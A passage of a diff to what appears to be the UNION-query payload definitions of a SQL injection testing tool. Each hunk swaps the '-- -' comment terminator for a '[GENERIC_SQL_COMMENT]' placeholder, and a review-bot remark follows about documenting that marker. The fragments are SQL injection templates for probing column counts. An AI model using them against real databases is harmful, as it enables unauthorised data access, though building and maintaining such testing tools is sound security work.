<columns>21-30</columns>
</request>
@@ -221,7 +221,7 @@
<vector>[UNION]</vector>
<request>
<payload/>
<comment>-- -</comment>
<comment>[GENERIC_SQL_COMMENT]</comment>
<char>[RANDNUM]</char>
<columns>21-30</columns>
</request>
@@ -240,7 +240,7 @@
<vector>[UNION]</vector>
<request>
<payload/>
<comment>-- -</comment>
<comment>[GENERIC_SQL_COMMENT]</comment>
<char>[CHAR]</char>
<columns>31-40</columns>
</request>
@@ -259,7 +259,7 @@
<vector>[UNION]</vector>
<request>
<payload/>
<comment>-- -</comment>
<comment>[GENERIC_SQL_COMMENT]</comment>
<char>NULL</char>
<columns>31-40</columns>
</request>
@@ -278,7 +278,7 @@
<vector>[UNION]</vector>
<request>
<payload/>
<comment>-- -</comment>
<comment>[GENERIC_SQL_COMMENT]</comment>
<char>[RANDNUM]</char>
<columns>31-40</columns>
</request>
@@ -297,7 +297,7 @@
<vector>[UNION]</vector>
<request>
<payload/>
<comment>-- -</comment>
<comment>[GENERIC_SQL_COMMENT]</comment>
<char>[CHAR]</char>
<columns>41-50</columns>
</request>
@@ -315,7 +315,7 @@
<vector>[UNION]</vector>
<request>
<payload/>
<comment>-- -</comment>
<comment>[GENERIC_SQL_COMMENT]</comment>
<char>NULL</char>
<columns>41-50</columns>
</request>
@@ -334,7 +334,7 @@
<vector>[UNION]</vector>
<request>
<payload/>
<comment>-- -</comment>
<comment>[GENERIC_SQL_COMMENT]</comment>
<char>[RANDNUM]</char>
<columns>41-50</columns>
</request>
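Review bot: The `[GENERIC_SQL_COMMENT]` marker that now fills every `<comment>` element in these hunks (first at the `-12,7 +12,7` hunk, then repeated through `-334,7 +334,7`) is not defined or explained anywhere in the visible part of this file. This assumes the second `<comment>` line of each pair is the new side, since the rendered page has lost the `+`/`-` column. Unlike the literal `-- -` it replaces, the marker only works if the code that loads these tests substitutes it. If any consumer of `<comment>` skips that step, the bracketed text would be sent verbatim and the test would silently stop matching. I would add a short note next to the file's existing tag documentation, for example `<!-- [GENERIC_SQL_COMMENT] is a marker expanded by the payload loader; it is not literal SQL -->`, and confirm that every reader of `<comment>` performs the expansion. The enclosing `<test>` elements start and end outside each hunk, so the surrounding fields were not checked.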